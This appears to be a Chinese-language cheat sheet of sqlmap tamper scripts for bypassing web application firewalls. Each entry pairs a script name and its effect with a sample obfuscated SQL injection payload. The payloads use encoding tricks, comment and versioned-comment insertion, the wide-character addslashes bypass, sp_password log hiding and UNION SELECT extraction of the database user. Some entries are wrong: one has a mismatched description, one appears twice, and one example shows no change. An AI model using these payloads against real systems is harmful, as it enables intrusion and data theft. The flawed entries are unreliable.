使用sqlmap中tamper腳本繞過waf
腳本名:0x2char.py
作用:用UTF-8全角對應字符替換撇號字符
作用:用等價的CONCAT(CHAR(),...)對應替換每個(MySQL)0x <hex>編碼的字符串
測試對象:
- MySQL 4,5.0和5.5
>>> tamper('SELECT 0xdeadbeef') 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
腳本名:apostrophemask.py
作用:用UTF-8全角對應字符替換撇號字符
>>> tamper("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
腳本名:apostrophenullencode.py
作用:用它的非法雙字節替代撇號字符
>>> tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
腳本名:appendnullbyte.py
作用:在有效負荷末尾追加編碼的空字節字符
需求:
- Microsoft Access
筆記:
- 用於在后端繞過弱Web應用程序防火牆時使用
- 數據庫管理系統是Microsoft Access
>>> tamper('1 AND 1=1') '1 AND 1=1%00'
腳本名:base64encode.py
作用:用base64編碼替換
>>> tamper("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw=='
腳本名:between.py
作用:
- 用'NOT BETWEEN 0 AND#'代替大於運算符('>')
- 用'BETWEEN#AND#'代替等號運算符('=')
測試對象:
- Microsoft SQL Server 2005
- MySQL 4,5.0和5.5
- Oracle 10g
- PostgreSQL 8.3,8.4,9.0
筆記:
- 有效繞過弱的Web應用程序防火牆過濾大於字符
- BETWEEN子句是SQL標准。 因此,這個篡改腳本應該針對所有數據庫
>>> tamper('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--' >>> tamper('1 AND A = B--') '1 AND A BETWEEN B AND B--'
腳本名:bluecoat.py
作用:用有效的隨機空白字符替換SQL語句后的空格字符,之后用操作符LIKE替換字符'='
需求:
- 如WAF文件所述,WAF激活的Blue Coat SGOS
測試對象:
- MySQL 5.1,SGOS
筆記:
- 用於繞過Blue Coat推薦的WAF規則配置
>>> tamper('SELECT id FROM users WHERE id = 1') 'SELECT%09id FROM%09users WHERE%09id LIKE 1'
腳本名:chardoubleencode.py
作用: 雙重網址編碼給定有效負載中的所有字符(不處理已經編碼的)
>>> tamper('SELECT FIELD FROM%20TABLE') '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
腳本名:charencode.py
作用:Url對給定有效負載中的所有字符進行編碼(尚未處理編碼)
測試對象:
- Microsoft SQL Server 2005
- MySQL 4,5.0和5.5
- Oracle 10g
- PostgreSQL 8.3,8.4,9.0
筆記:
- 非常有用,可以繞過非常弱的Web應用程序防火牆在通過其規則集處理請求之前對請求進行url解碼
- Web服務器無論如何都會通過url解碼,因此它應該對任何DBMS都有效
>>> tamper('SELECT FIELD FROM%20TABLE') '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
腳本名:charunicodeencode.py
作用:字符串 unicode 編碼
>>> tamper('SELECT FIELD%20FROM TABLE') '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
腳本名:equaltolike.py
作用:like 代替等號
>>> tamper('SELECT * FROM users WHERE id=1') 'SELECT * FROM users WHERE id LIKE 1'
腳本名:space2dash.py
作用:繞過過濾‘=’ 替換空格字符(”),(’ – ‘)后跟一個破折號注釋,一個隨機字符串和一個新行(’ n’)
>>> tamper('1 AND 9227=9227') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
腳本名:greatest.py
作用:繞過過濾’>’ ,用GREATEST替換大於號。
>>> tamper('1 AND A > B') '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
腳本名:space2hash.py
作用:空格替換為#號 隨機字符串 以及換行符
>>> tamper('1 AND 9227=9227') '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
腳本名:halfversionedmorekeywords.py
作用:當數據庫為mysql時繞過防火牆,每個關鍵字之前添加mysql版本評論
tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
腳本名:space2morehash.py
作用:空格替換為 #號 以及更多隨機字符串 換行符
>>> tamper('1 AND 9227=9227') '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
腳本名:ifnull2ifisnull.py
作用:繞過對 IFNULL 過濾。 替換類似’IFNULL(A, B)’為’IF(ISNULL(A), B, A)’
>>> tamper('IFNULL(1, 2)') 'IF(ISNULL(1),2,1)'
腳本名:space2mssqlblank.py(mssql)
作用:空格替換為其它空符號
>>> tamper('SELECT id FROM users') 'SELECT%A0id%0BFROM%0Cusers'
腳本名:space2mssqlhash.py
作用:替換空格
>>> tamper('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227'
腳本名:modsecurityversioned.py
作用:過濾空格,包含完整的查詢版本注釋
>>> tamper('1 AND 2>1--') '1 /*!30874AND 2>1*/--'
腳本名:space2mysqlblank.py
作用:空格替換其它空白符號(mysql)
>>> tamper('SELECT id FROM users') 'SELECT%A0id%0BFROM%0Cusers'
腳本名:space2mysqldash.py
作用:替換空格字符(”)(’ – ‘)后跟一個破折號注釋一個新行(’ n’)
注:之前有個mssql的 這個是mysql的
>>> tamper('1 AND 9227=9227') '1--%0AAND--%0A9227=9227'
腳本名:multiplespaces.py
作用:圍繞SQL關鍵字添加多個空格
>>> tamper('1 UNION SELECT foobar') '1 UNION SELECT foobar'
腳本名:space2plus.py
作用:用+替換空格
>>> tamper('SELECT id FROM users') 'SELECT+id+FROM+users'
腳本名:nonrecursivereplacement.py
作用:雙重查詢語句。取代predefined SQL關鍵字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters
>>> tamper('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--'
腳本名:space2randomblank.py
作用:代替空格字符(“”)從一個隨機的空白字符可選字符的有效集
>>> tamper('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers'
腳本名:sp_password.py
作用:追加sp_password’從DBMS日志的自動模糊處理的有效載荷的末尾
>>> tamper('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp_password'
腳本名:unionalltounion.py
作用:替換UNION ALL SELECT為UNION SELECT
>>> tamper('-1 UNION ALL SELECT') '-1 UNION SELECT'
腳本名:randomcase.py
作用:隨機大小寫
>>> tamper('INSERT') 'INseRt'
腳本名:unmagicquotes.py
作用:寬字符繞過 GPC addslashes
>>> tamper("1' AND 1=1") '1%bf%27-- '
腳本名:randomcomments.py
作用:用/**/分割sql關鍵字
>>> tamper('INSERT') 'I/**/N/**/SERT'
腳本名:securesphere.py
作用:追加特制的字符串
>>> tamper('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"
腳本名:versionedmorekeywords.py
作用:注釋繞過
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#') '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
腳本名:space2comment.py
作用:使用注釋替換空格字符
>>> tamper('SELECT id FROM users') 'SELECT/**/id/**/FROM/**/users'
腳本名:halfversionedmorekeywords.py
作用:關鍵字前加注釋
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"